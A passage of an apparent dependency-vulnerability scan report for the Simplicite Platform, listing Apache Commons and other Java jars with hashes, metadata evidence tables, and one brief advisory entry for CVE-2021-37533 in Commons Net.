Evidence Type Source Name Value Confidence Vendor file name commons-lang3 High Vendor jar package name apache Highest Vendor jar package name commons Highest Vendor jar package name lang3 Highest Vendor Manifest automatic-module-name org.apache.commons.lang3 Medium Vendor Manifest bundle-docurl http://commons.apache.org/proper/commons-lang/ Low Vendor Manifest bundle-symbolicname org.apache.commons.lang3 Medium Vendor Manifest implementation-url http://commons.apache.org/proper/commons-lang/ Low Vendor Manifest Implementation-Vendor The Apache Software Foundation High Vendor Manifest Implementation-Vendor-Id org.apache.commons Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.8))" Low Vendor Manifest specification-vendor The Apache Software Foundation Low Vendor pom artifactid commons-lang3 Highest Vendor pom artifactid commons-lang3 Low Vendor pom developer email bayard@apache.org Low Vendor pom developer email britter@apache.org Low Vendor pom developer email chtompki@apache.org Low Vendor pom developer email djones@apache.org Low Vendor pom developer email dlr@finemaltcoding.com Low Vendor pom developer email ggregory@apache.org Low Vendor pom developer email jcarman@apache.org Low Vendor pom developer email joerg.schaible@gmx.de Low Vendor pom developer email lguibert@apache.org Low Vendor pom developer email oheger@apache.org Low Vendor pom developer email pbenedict@apache.org Low Vendor pom developer email rdonkin@apache.org Low Vendor pom developer email scolebourne@joda.org Low Vendor pom developer email stevencaswell@apache.org Low Vendor pom developer id bayard Medium Vendor pom developer id britter Medium Vendor pom developer id chtompki Medium Vendor pom developer id djones Medium Vendor pom developer id dlr Medium Vendor pom developer id fredrik Medium Vendor pom developer id ggregory Medium Vendor pom developer id jcarman Medium Vendor pom developer id joehni Medium Vendor pom developer id lguibert Medium Vendor 
pom developer id mbenson Medium Vendor pom developer id niallp Medium Vendor pom developer id oheger Medium Vendor pom developer id pbenedict Medium Vendor pom developer id rdonkin Medium Vendor pom developer id scaswell Medium Vendor pom developer id scolebourne Medium Vendor pom developer name Benedikt Ritter Medium Vendor pom developer name Daniel Rall Medium Vendor pom developer name Duncan Jones Medium Vendor pom developer name Fredrik Westermarck Medium Vendor pom developer name Gary D. Gregory Medium Vendor pom developer name Henri Yandell Medium Vendor pom developer name James Carman Medium Vendor pom developer name Joerg Schaible Medium Vendor pom developer name Loic Guibert Medium Vendor pom developer name Matt Benson Medium Vendor pom developer name Niall Pemberton Medium Vendor pom developer name Oliver Heger Medium Vendor pom developer name Paul Benedict Medium Vendor pom developer name Rob Tompkins Medium Vendor pom developer name Robert Burrell Donkin Medium Vendor pom developer name Stephen Colebourne Medium Vendor pom developer name Steven Caswell Medium Vendor pom developer org Carman Consulting, Inc. Medium Vendor pom developer org CollabNet, Inc. 
Medium Vendor pom developer org SITA ATS Ltd Medium Vendor pom groupid org.apache.commons Highest Vendor pom name Apache Commons Lang High Vendor pom parent-artifactid commons-parent Low Vendor pom url http://commons.apache.org/proper/commons-lang/ Highest Product file name commons-lang3 High Product jar package name apache Highest Product jar package name commons Highest Product jar package name lang3 Highest Product Manifest automatic-module-name org.apache.commons.lang3 Medium Product Manifest bundle-docurl http://commons.apache.org/proper/commons-lang/ Low Product Manifest Bundle-Name Apache Commons Lang Medium Product Manifest bundle-symbolicname org.apache.commons.lang3 Medium Product Manifest Implementation-Title Apache Commons Lang High Product Manifest implementation-url http://commons.apache.org/proper/commons-lang/ Low Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.8))" Low Product Manifest specification-title Apache Commons Lang Medium Product pom artifactid commons-lang3 Highest Product pom developer email bayard@apache.org Low Product pom developer email britter@apache.org Low Product pom developer email chtompki@apache.org Low Product pom developer email djones@apache.org Low Product pom developer email dlr@finemaltcoding.com Low Product pom developer email ggregory@apache.org Low Product pom developer email jcarman@apache.org Low Product pom developer email joerg.schaible@gmx.de Low Product pom developer email lguibert@apache.org Low Product pom developer email oheger@apache.org Low Product pom developer email pbenedict@apache.org Low Product pom developer email rdonkin@apache.org Low Product pom developer email scolebourne@joda.org Low Product pom developer email stevencaswell@apache.org Low Product pom developer id bayard Low Product pom developer id britter Low Product pom developer id chtompki Low Product pom developer id djones Low Product pom developer id dlr Low Product pom developer id fredrik Low Product 
pom developer id ggregory Low Product pom developer id jcarman Low Product pom developer id joehni Low Product pom developer id lguibert Low Product pom developer id mbenson Low Product pom developer id niallp Low Product pom developer id oheger Low Product pom developer id pbenedict Low Product pom developer id rdonkin Low Product pom developer id scaswell Low Product pom developer id scolebourne Low Product pom developer name Benedikt Ritter Low Product pom developer name Daniel Rall Low Product pom developer name Duncan Jones Low Product pom developer name Fredrik Westermarck Low Product pom developer name Gary D. Gregory Low Product pom developer name Henri Yandell Low Product pom developer name James Carman Low Product pom developer name Joerg Schaible Low Product pom developer name Loic Guibert Low Product pom developer name Matt Benson Low Product pom developer name Niall Pemberton Low Product pom developer name Oliver Heger Low Product pom developer name Paul Benedict Low Product pom developer name Rob Tompkins Low Product pom developer name Robert Burrell Donkin Low Product pom developer name Stephen Colebourne Low Product pom developer name Steven Caswell Low Product pom developer org Carman Consulting, Inc. Low Product pom developer org CollabNet, Inc. Low Product pom developer org SITA ATS Ltd Low Product pom groupid org.apache.commons Highest Product pom name Apache Commons Lang High Product pom parent-artifactid commons-parent Medium Product pom url http://commons.apache.org/proper/commons-lang/ Medium Version file version 3.9 High Version Manifest Implementation-Version 3.9 High Version pom parent-version 3.9 Low Version pom version 3.9 Highest
commons-logging-1.2.jar
Description: Apache Commons Logging is a thin adapter allowing configurable bridging to other, well known logging systems.
License: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/commons-logging/commons-logging/1.2/commons-logging-1.2.jar
MD5: 040b4b4d8eac886f6b4a2a3bd2f31b00
SHA1: 4bfc12adfe4842bf07b657f0369c4cb522955686
SHA256: daddea1ea0be0f56978ab3006b8ac92834afeefbd9b7e4e6316fca57df0fa636
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name commons-logging High Vendor jar package name apache Highest Vendor jar package name commons Highest Vendor jar package name logging Highest Vendor Manifest bundle-docurl http://commons.apache.org/proper/commons-logging/ Low Vendor Manifest bundle-symbolicname org.apache.commons.logging Medium Vendor Manifest implementation-build tags/LOGGING_1_2_RC2@r1608092; 2014-07-05 20:11:44+0200 Low Vendor Manifest Implementation-Vendor The Apache Software Foundation High Vendor Manifest Implementation-Vendor-Id org.apache Medium Vendor Manifest specification-vendor The Apache Software Foundation Low Vendor pom artifactid commons-logging Highest Vendor pom artifactid commons-logging Low Vendor pom developer email baliuka@apache.org Low Vendor pom developer email costin@apache.org Low Vendor pom developer email craigmcc@apache.org Low Vendor pom developer email dennisl@apache.org Low Vendor pom developer email donaldp@apache.org Low Vendor pom developer email morgand@apache.org Low Vendor pom developer email rdonkin@apache.org Low Vendor pom developer email rsitze@apache.org Low Vendor pom developer email rwaldhoff@apache.org Low Vendor pom developer email sanders@apache.org Low Vendor pom developer email skitching@apache.org Low Vendor pom developer email tn@apache.org Low Vendor pom developer id baliuka Medium Vendor pom developer id bstansberry Medium Vendor pom developer id costin Medium Vendor pom developer id craigmcc Medium Vendor pom developer id dennisl Medium Vendor pom developer id donaldp Medium Vendor pom developer id morgand Medium Vendor pom developer id rdonkin Medium Vendor pom developer id rsitze Medium Vendor pom developer id rwaldhoff Medium Vendor pom developer id sanders Medium Vendor pom developer id skitching Medium Vendor pom developer id tn Medium Vendor pom developer name Brian Stansberry Medium Vendor pom developer name Costin Manolache Medium Vendor pom developer name Craig McClanahan 
Medium Vendor pom developer name Dennis Lundberg Medium Vendor pom developer name Juozas Baliuka Medium Vendor pom developer name Morgan Delagrange Medium Vendor pom developer name Peter Donald Medium Vendor pom developer name Richard Sitze Medium Vendor pom developer name Robert Burrell Donkin Medium Vendor pom developer name Rodney Waldhoff Medium Vendor pom developer name Scott Sanders Medium Vendor pom developer name Simon Kitching Medium Vendor pom developer name Thomas Neidhart Medium Vendor pom developer org Apache Medium Vendor pom developer org The Apache Software Foundation Medium Vendor pom groupid commons-logging Highest Vendor pom name Apache Commons Logging High Vendor pom parent-artifactid commons-parent Low Vendor pom parent-groupid org.apache.commons Medium Vendor pom url http://commons.apache.org/proper/commons-logging/ Highest Product file name commons-logging High Product jar package name apache Highest Product jar package name commons Highest Product jar package name logging Highest Product Manifest bundle-docurl http://commons.apache.org/proper/commons-logging/ Low Product Manifest Bundle-Name Apache Commons Logging Medium Product Manifest bundle-symbolicname org.apache.commons.logging Medium Product Manifest implementation-build tags/LOGGING_1_2_RC2@r1608092; 2014-07-05 20:11:44+0200 Low Product Manifest Implementation-Title Apache Commons Logging High Product Manifest specification-title Apache Commons Logging Medium Product pom artifactid commons-logging Highest Product pom developer email baliuka@apache.org Low Product pom developer email costin@apache.org Low Product pom developer email craigmcc@apache.org Low Product pom developer email dennisl@apache.org Low Product pom developer email donaldp@apache.org Low Product pom developer email morgand@apache.org Low Product pom developer email rdonkin@apache.org Low Product pom developer email rsitze@apache.org Low Product pom developer email rwaldhoff@apache.org Low Product pom developer email 
sanders@apache.org Low Product pom developer email skitching@apache.org Low Product pom developer email tn@apache.org Low Product pom developer id baliuka Low Product pom developer id bstansberry Low Product pom developer id costin Low Product pom developer id craigmcc Low Product pom developer id dennisl Low Product pom developer id donaldp Low Product pom developer id morgand Low Product pom developer id rdonkin Low Product pom developer id rsitze Low Product pom developer id rwaldhoff Low Product pom developer id sanders Low Product pom developer id skitching Low Product pom developer id tn Low Product pom developer name Brian Stansberry Low Product pom developer name Costin Manolache Low Product pom developer name Craig McClanahan Low Product pom developer name Dennis Lundberg Low Product pom developer name Juozas Baliuka Low Product pom developer name Morgan Delagrange Low Product pom developer name Peter Donald Low Product pom developer name Richard Sitze Low Product pom developer name Robert Burrell Donkin Low Product pom developer name Rodney Waldhoff Low Product pom developer name Scott Sanders Low Product pom developer name Simon Kitching Low Product pom developer name Thomas Neidhart Low Product pom developer org Apache Low Product pom developer org The Apache Software Foundation Low Product pom groupid commons-logging Highest Product pom name Apache Commons Logging High Product pom parent-artifactid commons-parent Medium Product pom parent-groupid org.apache.commons Medium Product pom url http://commons.apache.org/proper/commons-logging/ Medium Version file version 1.2 High Version Manifest Implementation-Version 1.2 High Version pom parent-version 1.2 Low Version pom version 1.2 Highest
commons-math3-3.6.1.jar
Description: The Apache Commons Math project is a library of lightweight, self-contained mathematics and statistics components addressing the most common practical problems not immediately available in the Java programming language or commons-lang.
License: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/org/apache/commons/commons-math3/3.6.1/commons-math3-3.6.1.jar
MD5: 5b730d97e4e6368069de1983937c508e
SHA1: e4ba98f1d4b3c80ec46392f25e094a6a2e58fcbf
SHA256: 1e56d7b058d28b65abd256b8458e3885b674c1d588fa43cd7d1cbb9c7ef2b308
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name commons-math3 High Vendor jar package name apache Highest Vendor jar package name commons Highest Vendor jar package name math3 Highest Vendor Manifest bundle-docurl http://commons.apache.org/proper/commons-math/ Low Vendor Manifest bundle-symbolicname org.apache.commons.math3 Medium Vendor Manifest implementation-build 16abfe5de688cc52fb0396e0609cb33044b15653; 2016-03-17 13:30:43-0400 Low Vendor Manifest implementation-url http://commons.apache.org/proper/commons-math/ Low Vendor Manifest Implementation-Vendor The Apache Software Foundation High Vendor Manifest Implementation-Vendor-Id org.apache Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.5))" Low Vendor Manifest specification-vendor The Apache Software Foundation Low Vendor pom artifactid commons-math3 Highest Vendor pom artifactid commons-math3 Low Vendor pom developer email achou at apache dot org Low Vendor pom developer email billbarker at apache dot org Low Vendor pom developer email brentworden at apache dot org Low Vendor pom developer email celestin at apache dot org Low Vendor pom developer email dimpbx at apache dot org Low Vendor pom developer email erans at apache dot org Low Vendor pom developer email evanward at apache dot org Low Vendor pom developer email gregs at apache dot org Low Vendor pom developer email j3322ptm at yahoo dot de Low Vendor pom developer email luc at apache dot org Low Vendor pom developer email mdiggory at apache dot org Low Vendor pom developer email mikl at apache dot org Low Vendor pom developer email oertl at apache dot org Low Vendor pom developer email rdonkin at apache dot org Low Vendor pom developer email tn at apache dot org Low Vendor pom developer email tobrien at apache dot org Low Vendor pom developer id achou Medium Vendor pom developer id billbarker Medium Vendor pom developer id brentworden Medium Vendor pom developer id celestin Medium Vendor pom 
developer id dimpbx Medium Vendor pom developer id erans Medium Vendor pom developer id evanward Medium Vendor pom developer id gregs Medium Vendor pom developer id luc Medium Vendor pom developer id mdiggory Medium Vendor pom developer id mikl Medium Vendor pom developer id oertl Medium Vendor pom developer id pietsch Medium Vendor pom developer id rdonkin Medium Vendor pom developer id tn Medium Vendor pom developer id tobrien Medium Vendor pom developer name Albert Davidson Chou Medium Vendor pom developer name Bill Barker Medium Vendor pom developer name Brent Worden Medium Vendor pom developer name Dimitri Pourbaix Medium Vendor pom developer name Evan Ward Medium Vendor pom developer name Gilles Sadowski Medium Vendor pom developer name Greg Sterijevski Medium Vendor pom developer name J. Pietschmann Medium Vendor pom developer name Luc Maisonobe Medium Vendor pom developer name Mark Diggory Medium Vendor pom developer name Mikkel Meyer Andersen Medium Vendor pom developer name Otmar Ertl Medium Vendor pom developer name Robert Burrell Donkin Medium Vendor pom developer name Sébastien Brisard Medium Vendor pom developer name Thomas Neidhart Medium Vendor pom developer name Tim O'Brien Medium Vendor pom groupid org.apache.commons Highest Vendor pom name Apache Commons Math High Vendor pom parent-artifactid commons-parent Low Vendor pom url http://commons.apache.org/proper/commons-math/ Highest Product file name commons-math3 High Product jar package name apache Highest Product jar package name commons Highest Product jar package name filter Highest Product jar package name math3 Highest Product Manifest bundle-docurl http://commons.apache.org/proper/commons-math/ Low Product Manifest Bundle-Name Apache Commons Math Medium Product Manifest bundle-symbolicname org.apache.commons.math3 Medium Product Manifest implementation-build 16abfe5de688cc52fb0396e0609cb33044b15653; 2016-03-17 13:30:43-0400 Low Product Manifest Implementation-Title Apache Commons Math High 
Product Manifest implementation-url http://commons.apache.org/proper/commons-math/ Low Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.5))" Low Product Manifest specification-title Apache Commons Math Medium Product pom artifactid commons-math3 Highest Product pom developer email achou at apache dot org Low Product pom developer email billbarker at apache dot org Low Product pom developer email brentworden at apache dot org Low Product pom developer email celestin at apache dot org Low Product pom developer email dimpbx at apache dot org Low Product pom developer email erans at apache dot org Low Product pom developer email evanward at apache dot org Low Product pom developer email gregs at apache dot org Low Product pom developer email j3322ptm at yahoo dot de Low Product pom developer email luc at apache dot org Low Product pom developer email mdiggory at apache dot org Low Product pom developer email mikl at apache dot org Low Product pom developer email oertl at apache dot org Low Product pom developer email rdonkin at apache dot org Low Product pom developer email tn at apache dot org Low Product pom developer email tobrien at apache dot org Low Product pom developer id achou Low Product pom developer id billbarker Low Product pom developer id brentworden Low Product pom developer id celestin Low Product pom developer id dimpbx Low Product pom developer id erans Low Product pom developer id evanward Low Product pom developer id gregs Low Product pom developer id luc Low Product pom developer id mdiggory Low Product pom developer id mikl Low Product pom developer id oertl Low Product pom developer id pietsch Low Product pom developer id rdonkin Low Product pom developer id tn Low Product pom developer id tobrien Low Product pom developer name Albert Davidson Chou Low Product pom developer name Bill Barker Low Product pom developer name Brent Worden Low Product pom developer name Dimitri Pourbaix Low Product pom developer name 
Evan Ward Low Product pom developer name Gilles Sadowski Low Product pom developer name Greg Sterijevski Low Product pom developer name J. Pietschmann Low Product pom developer name Luc Maisonobe Low Product pom developer name Mark Diggory Low Product pom developer name Mikkel Meyer Andersen Low Product pom developer name Otmar Ertl Low Product pom developer name Robert Burrell Donkin Low Product pom developer name Sébastien Brisard Low Product pom developer name Thomas Neidhart Low Product pom developer name Tim O'Brien Low Product pom groupid org.apache.commons Highest Product pom name Apache Commons Math High Product pom parent-artifactid commons-parent Medium Product pom url http://commons.apache.org/proper/commons-math/ Medium Version file version 3.6.1 High Version Manifest Bundle-Version 3.6.1 High Version Manifest Implementation-Version 3.6.1 High Version pom parent-version 3.6.1 Low Version pom version 3.6.1 Highest
commons-net-3.6.jar
Description: Apache Commons Net library contains a collection of network utilities and protocol implementations. Supported protocols include: Echo, Finger, FTP, NNTP, NTP, POP3(S), SMTP(S), Telnet, Whois
License: https://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/commons-net/commons-net/3.6/commons-net-3.6.jar
MD5: b46661b01cc7aeec501f1cd3775509f1
SHA1: b71de00508dcb078d2b24b5fa7e538636de9b3da
SHA256: d3b3866c61a47ba3bf040ab98e60c3010d027da0e7a99e1755e407dd47bc2702
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name commons-net High Vendor jar package name apache Highest Vendor jar package name commons Highest Vendor jar package name echo Highest Vendor jar package name finger Highest Vendor jar package name ftp Highest Vendor jar package name net Highest Vendor jar package name nntp Highest Vendor jar package name pop3 Highest Vendor jar package name smtp Highest Vendor jar package name telnet Highest Vendor jar package name whois Highest Vendor Manifest bundle-docurl http://commons.apache.org/proper/commons-net/ Low Vendor Manifest bundle-symbolicname org.apache.commons.net Medium Vendor Manifest implementation-build tags/NET_3_6_RC1@r1782607; 2017-02-11 15:16:26+0000 Low Vendor Manifest implementation-url http://commons.apache.org/proper/commons-net/ Low Vendor Manifest Implementation-Vendor The Apache Software Foundation High Vendor Manifest Implementation-Vendor-Id org.apache Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.6))" Low Vendor Manifest specification-vendor The Apache Software Foundation Low Vendor pom artifactid commons-net Highest Vendor pom artifactid commons-net Low Vendor pom developer email bruno.davanzo@hp.com Low Vendor pom developer email dfs@apache.org Low Vendor pom developer email Jeff.Brekke@qg.com Low Vendor pom developer email rwinston@apache.org Low Vendor pom developer email rwinston@checkfree.com Low Vendor pom developer email scohen@apache.org Low Vendor pom developer id brekke Medium Vendor pom developer id brudav Medium Vendor pom developer id dfs Medium Vendor pom developer id rwinston Medium Vendor pom developer id scohen Medium Vendor pom developer name Bruno D'Avanzo Medium Vendor pom developer name Daniel F. Savarese Medium Vendor pom developer name Jeffrey D. Brekke Medium Vendor pom developer name Rory Winston Medium Vendor pom developer name Steve Cohen Medium Vendor pom developer org
Savarese Software Research (http://www.savarese.com/)
Medium Vendor pom developer org Hewlett-Packard Medium Vendor pom developer org javactivity.org Medium Vendor pom developer org Quad/Graphics, Inc. Medium Vendor pom groupid commons-net Highest Vendor pom name Apache Commons Net High Vendor pom parent-artifactid commons-parent Low Vendor pom parent-groupid org.apache.commons Medium Vendor pom url http://commons.apache.org/proper/commons-net/ Highest Product file name commons-net High Product jar package name apache Highest Product jar package name commons Highest Product jar package name echo Highest Product jar package name finger Highest Product jar package name ftp Highest Product jar package name net Highest Product jar package name nntp Highest Product jar package name pop3 Highest Product jar package name smtp Highest Product jar package name telnet Highest Product jar package name whois Highest Product Manifest bundle-docurl http://commons.apache.org/proper/commons-net/ Low Product Manifest Bundle-Name Apache Commons Net Medium Product Manifest bundle-symbolicname org.apache.commons.net Medium Product Manifest implementation-build tags/NET_3_6_RC1@r1782607; 2017-02-11 15:16:26+0000 Low Product Manifest Implementation-Title Apache Commons Net High Product Manifest implementation-url http://commons.apache.org/proper/commons-net/ Low Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.6))" Low Product Manifest specification-title Apache Commons Net Medium Product pom artifactid commons-net Highest Product pom developer email bruno.davanzo@hp.com Low Product pom developer email dfs@apache.org Low Product pom developer email Jeff.Brekke@qg.com Low Product pom developer email rwinston@apache.org Low Product pom developer email rwinston@checkfree.com Low Product pom developer email scohen@apache.org Low Product pom developer id brekke Low Product pom developer id brudav Low Product pom developer id dfs Low Product pom developer id rwinston Low Product pom developer id scohen Low 
Product pom developer name Bruno D'Avanzo Low Product pom developer name Daniel F. Savarese Low Product pom developer name Jeffrey D. Brekke Low Product pom developer name Rory Winston Low Product pom developer name Steve Cohen Low Product pom developer org
Savarese Software Research (http://www.savarese.com/)
Low Product pom developer org Hewlett-Packard Low Product pom developer org javactivity.org Low Product pom developer org Quad/Graphics, Inc. Low Product pom groupid commons-net Highest Product pom name Apache Commons Net High Product pom parent-artifactid commons-parent Medium Product pom parent-groupid org.apache.commons Medium Product pom url http://commons.apache.org/proper/commons-net/ Medium Version file version 3.6 High Version Manifest Implementation-Version 3.6 High Version pom parent-version 3.6 Low Version pom version 3.6 Highest
CVE-2021-37533
Prior to Apache Commons Net 3.9.0, Net's FTP client trusts the host from PASV response by default. A malicious server can redirect the Commons Net code to use a different host, but the user has to connect to the malicious server in the first place. This may lead to leakage of information about services running on the private network of the client. The default in version 3.9.0 is now false to ignore such hosts, as cURL does. See https://issues.apache.org/jira/browse/NET-711.
CWE-20 Improper Input Validation
CVSSv3: Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
References:
Vulnerable Software & Versions:
commons-pool2-2.7.0.jar
Description: The Apache Commons Object Pooling Library.
License: https://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/org/apache/commons/commons-pool2/2.7.0/commons-pool2-2.7.0.jar
MD5: f4c036f0baf058b3320b35c0b04a7a29
SHA1: 7f9ccfaaf76b0ba8b4200480971a170364a9c361
SHA256: 6b54c675c7387e157d28c7098873f2e772c223c7a35bc9b13717367c9753a1e4
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name commons-pool2 High Vendor jar package name apache Highest Vendor jar package name commons Highest Vendor jar package name pool2 Highest Vendor Manifest bundle-docurl https://commons.apache.org/proper/commons-pool/ Low Vendor Manifest bundle-symbolicname org.apache.commons.commons-pool2 Medium Vendor Manifest implementation-build release@rf4455dcb8afaf9ae7054589110f1082a7a8a282c; 2019-07-25 14:36:11+0000 Low Vendor Manifest implementation-url https://commons.apache.org/proper/commons-pool/ Low Vendor Manifest Implementation-Vendor The Apache Software Foundation High Vendor Manifest Implementation-Vendor-Id org.apache Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.8))" Low Vendor Manifest specification-vendor The Apache Software Foundation Low Vendor pom artifactid commons-pool2 Highest Vendor pom artifactid commons-pool2 Low Vendor pom developer id craigmcc Medium Vendor pom developer id dirkv Medium Vendor pom developer id dweinr1 Medium Vendor pom developer id geirm Medium Vendor pom developer id ggregory Medium Vendor pom developer id mattsicker Medium Vendor pom developer id morgand Medium Vendor pom developer id rdonkin Medium Vendor pom developer id rwaldhoff Medium Vendor pom developer id sandymac Medium Vendor pom developer id simonetripodi Medium Vendor pom developer name Craig McClanahan Medium Vendor pom developer name David Weinrich Medium Vendor pom developer name Dirk Verbeeck Medium Vendor pom developer name Gary Gregory Medium Vendor pom developer name Geir Magnusson Medium Vendor pom developer name Matt Sicker Medium Vendor pom developer name Morgan Delagrange Medium Vendor pom developer name Robert Burrell Donkin Medium Vendor pom developer name Rodney Waldhoff Medium Vendor pom developer name Sandy McArthur Medium Vendor pom developer name Simone Tripodi Medium Vendor pom developer org The Apache Software Foundation Medium Vendor pom groupid 
org.apache.commons Highest Vendor pom name Apache Commons Pool High Vendor pom parent-artifactid commons-parent Low Vendor pom url https://commons.apache.org/proper/commons-pool/ Highest Product file name commons-pool2 High Product jar package name apache Highest Product jar package name commons Highest Product jar package name pool2 Highest Product Manifest bundle-docurl https://commons.apache.org/proper/commons-pool/ Low Product Manifest Bundle-Name Apache Commons Pool Medium Product Manifest bundle-symbolicname org.apache.commons.commons-pool2 Medium Product Manifest implementation-build release@rf4455dcb8afaf9ae7054589110f1082a7a8a282c; 2019-07-25 14:36:11+0000 Low Product Manifest Implementation-Title Apache Commons Pool High Product Manifest implementation-url https://commons.apache.org/proper/commons-pool/ Low Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.8))" Low Product Manifest specification-title Apache Commons Pool Medium Product pom artifactid commons-pool2 Highest Product pom developer id craigmcc Low Product pom developer id dirkv Low Product pom developer id dweinr1 Low Product pom developer id geirm Low Product pom developer id ggregory Low Product pom developer id mattsicker Low Product pom developer id morgand Low Product pom developer id rdonkin Low Product pom developer id rwaldhoff Low Product pom developer id sandymac Low Product pom developer id simonetripodi Low Product pom developer name Craig McClanahan Low Product pom developer name David Weinrich Low Product pom developer name Dirk Verbeeck Low Product pom developer name Gary Gregory Low Product pom developer name Geir Magnusson Low Product pom developer name Matt Sicker Low Product pom developer name Morgan Delagrange Low Product pom developer name Robert Burrell Donkin Low Product pom developer name Rodney Waldhoff Low Product pom developer name Sandy McArthur Low Product pom developer name Simone Tripodi Low Product pom developer org The Apache 
Software Foundation Low Product pom groupid org.apache.commons Highest Product pom name Apache Commons Pool High Product pom parent-artifactid commons-parent Medium Product pom url https://commons.apache.org/proper/commons-pool/ Medium Version file version 2.7.0 High Version Manifest Bundle-Version 2.7.0 High Version Manifest Implementation-Version 2.7.0 High Version pom parent-version 2.7.0 Low Version pom version 2.7.0 Highest
commons-vfs2-2.4.1.jar
Description: Apache Commons VFS is a Virtual File System library.
License: https://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/org/apache/commons/commons-vfs2/2.4.1/commons-vfs2-2.4.1.jar
MD5: 3689ad3e33c2455c033c7062f583c49f
SHA1: 2b041628c3cb436d8eee25f78603f04eb5e817a5
SHA256: 1d518e883bb4e9a791c2bb48c76ed7b8879708b312ed955854e50b831e23ed35
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name commons-vfs2 High Vendor jar package name apache Highest Vendor jar package name commons Highest Vendor jar package name vfs Highest Vendor jar package name vfs2 Highest Vendor Manifest bundle-docurl http://commons.apache.org/proper/commons-vfs/ Low Vendor Manifest bundle-symbolicname org.apache.commons.vfs2 Medium Vendor Manifest implementation-build release@reabdee306d5b0a73859a0aa841a5c0ccfe8b337a; 2019-08-11 00:23:00+0000 Low Vendor Manifest implementation-url http://commons.apache.org/proper/commons-vfs/ Low Vendor Manifest Implementation-Vendor The Apache Software Foundation High Vendor Manifest Implementation-Vendor-Id org.apache Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.8))" Low Vendor Manifest specification-vendor The Apache Software Foundation Low Vendor pom artifactid commons-vfs2 Highest Vendor pom artifactid commons-vfs2 Low Vendor pom groupid org.apache.commons Highest Vendor pom name Apache Commons VFS High Vendor pom parent-artifactid commons-vfs2-project Low Vendor pom url http://commons.apache.org/proper/commons-vfs/ Highest Product file name commons-vfs2 High Product jar package name apache Highest Product jar package name commons Highest Product jar package name filter Highest Product jar package name vfs Highest Product jar package name vfs2 Highest Product Manifest bundle-docurl http://commons.apache.org/proper/commons-vfs/ Low Product Manifest Bundle-Name Apache Commons VFS Medium Product Manifest bundle-symbolicname org.apache.commons.vfs2 Medium Product Manifest implementation-build release@reabdee306d5b0a73859a0aa841a5c0ccfe8b337a; 2019-08-11 00:23:00+0000 Low Product Manifest Implementation-Title Apache Commons VFS High Product Manifest implementation-url http://commons.apache.org/proper/commons-vfs/ Low Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.8))" Low Product Manifest specification-title 
Apache Commons VFS Medium Product pom artifactid commons-vfs2 Highest Product pom groupid org.apache.commons Highest Product pom name Apache Commons VFS High Product pom parent-artifactid commons-vfs2-project Medium Product pom url http://commons.apache.org/proper/commons-vfs/ Medium Version file version 2.4.1 High Version Manifest Bundle-Version 2.4.1 High Version Manifest Implementation-Version 2.4.1 High Version pom version 2.4.1 Highest
core-3.0.1.jar
Description: Core barcode encoding/decoding library
File Path: /var/simplicite/.m2/repository/com/google/zxing/core/3.0.1/core-3.0.1.jar
MD5: 0a0184c3f92492f721d8631d6f5237de
SHA1: 9ebf6cd580d67601fbf88fd007aab4703b19e4c2
SHA256: 38c49045765281e4c170062fa3f48e4e988629bf985cab850c7497be5eaa72a1
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name core High Vendor jar package name google Highest Vendor jar package name google Low Vendor jar package name zxing Highest Vendor jar package name zxing Low Vendor pom artifactid core Highest Vendor pom artifactid core Low Vendor pom groupid com.google.zxing Highest Vendor pom name ZXing Core High Vendor pom parent-artifactid zxing-parent Low Product file name core High Product jar package name google Highest Product jar package name zxing Highest Product jar package name zxing Low Product pom artifactid core Highest Product pom groupid com.google.zxing Highest Product pom name ZXing Core High Product pom parent-artifactid zxing-parent Medium Version file version 3.0.1 High Version pom version 3.0.1 Highest
curvesapi-1.06.jar
Description: Implementation of various mathematical curves that define themselves over a set of control points. The API is written in Java. The curves supported are: Bezier, B-Spline, Cardinal Spline, Catmull-Rom Spline, Lagrange, Natural Cubic Spline, and NURBS.
License: BSD License: http://opensource.org/licenses/BSD-3-Clause
File Path: /var/simplicite/.m2/repository/com/github/virtuald/curvesapi/1.06/curvesapi-1.06.jar
MD5: 049221bdb7f8d8a2065c02000e854ed4
SHA1: 159dd2e8956459a4eb0a9a6ecda9004d8d289708
SHA256: 38bb45c99e6153260c19b97b99b6a7370a067de63344de6d1ea11922acaed86b
Referenced In Project/Scope: Simplicite Platform:compile
